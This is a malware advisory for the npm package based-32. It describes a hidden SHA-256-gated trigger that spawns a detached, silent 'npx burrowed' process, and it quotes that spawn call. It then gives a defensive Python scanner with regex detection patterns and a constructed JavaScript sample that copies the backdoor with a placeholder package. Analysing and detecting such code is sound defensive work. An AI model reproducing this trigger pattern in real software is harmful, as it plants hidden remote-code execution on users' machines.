MAL-2026-6447
Malicious code in based-32 (npm)
Details
## Source: amazon-inspector (52ca241d887ed83628c8c4a4432ca0f832d092e6058c7ab4250cc5b169ba7fb9)

based-32 advertises itself as a zero-dependency RFC4648 Base32 encoding library, but `dist/index.js` ships a hidden trigger inside the exported `handleSecureEncode()` function (also reachable via the `based32 -s <data>` CLI). The function passes the caller's input through `checkSecurityProtocol()`, which SHA-256-hashes the input and compares it against the hardcoded constant `SECURITY_HASH = "71c37c896ba7d9164cc91cb4507df9d3f42bd2ce728a93673b3dabfda45c7ed2"`. On match, it executes `spawn('npx', ['burrowed','on','--root'], { detached: true, stdio: 'ignore', windowsHide: true, shell: true })` and calls `unref()` on the child, fetching and running the remote `burrowed` npm package as a detached, stdio-suppressed, window-hidden daemon. The surrounding try/catch swallows all errors so failures are silent. The naming (`SECURITY_HASH`, `checkSecurityProtocol`, `handleSecureEncode`) is a cover story — none of this behavior is documented in the README, and there is no Base32-related reason for the package to spawn npx, fetch a remote package, or run a daemon. Any environment where an attacker can deliver the magic input string into `handleSecureEncode` (or invoke `based32 -s`) gains arbitrary remote-code execution as a hidden background process under the installer's user.
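The trigger shape described above (a SHA-256 gate against a hardcoded digest guarding a detached, stdio-suppressed `npx` spawn) is simple enough to screen for statically. The scanner below is an added example, not code from based-32 or from the advisory source; it assumes unminified JavaScript text, uses regex heuristics only, and runs against two constructed samples rather than the real `dist/index.js`.

```python
import re
# Indicator patterns (assumption: unminified JS source text; heuristics only).
HASH_GATE = re.compile(r"createHash\(\s*['\"]sha256['\"]\s*\)")
HEX64_CONST = re.compile(r"=\s*['\"][0-9a-fA-F]{64}['\"]")
NPX_SPAWN = re.compile(r"spawn\(\s*['\"]npx['\"]")
DETACHED = re.compile(r"detached\s*:\s*true")
STDIO_IGNORE = re.compile(r"stdio\s*:\s*['\"]ignore['\"]")
UNREF = re.compile(r"\.unref\(\s*\)")

def scan_js(source: str) -> list[str]:
    """Return the names of the indicators present in `source`."""
    found = []
    if HASH_GATE.search(source) and HEX64_CONST.search(source):
        found.append("sha256-gate-on-hardcoded-hash")
    if NPX_SPAWN.search(source):
        found.append("spawn-npx")
        if DETACHED.search(source) and STDIO_IGNORE.search(source):
            found.append("detached-silent-child")
        if UNREF.search(source):
            found.append("child-unref")
    return found

def is_suspicious(source: str) -> bool:
    """An npx spawn combined with a hash gate is the trigger shape from the advisory."""
    found = set(scan_js(source))
    return "spawn-npx" in found and "sha256-gate-on-hardcoded-hash" in found

# Constructed sample mimicking the described trigger (not the real dist/index.js).
MALICIOUS_SAMPLE = """
const { createHash } = require('crypto');
const { spawn } = require('child_process');
const SECURITY_HASH = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef";  // constructed
function checkSecurityProtocol(input) {
  return createHash('sha256').update(input).digest('hex') === SECURITY_HASH;
}
function handleSecureEncode(input) {
  try {
    if (checkSecurityProtocol(input)) {
      spawn('npx', ['PLACEHOLDER_PKG'], { detached: true, stdio: 'ignore', shell: true }).unref();
    }
  } catch (e) {}
  return input;
}
"""
# Constructed benign Base32 encoder fragment for comparison.
BENIGN_SAMPLE = """
const ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";
function encode(buf) { return [...buf].map(b => ALPHABET[b & 31]).join(''); }
"""
```

Run `scan_js` over every `.js` file under `node_modules/<package>/` at install review time; a hit on the combined gate-plus-spawn pattern is a strong signal to read the file by hand.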
Affected packages
No fixed version published yet for based-32 (npm). Pin to a known-safe version or switch to an alternative.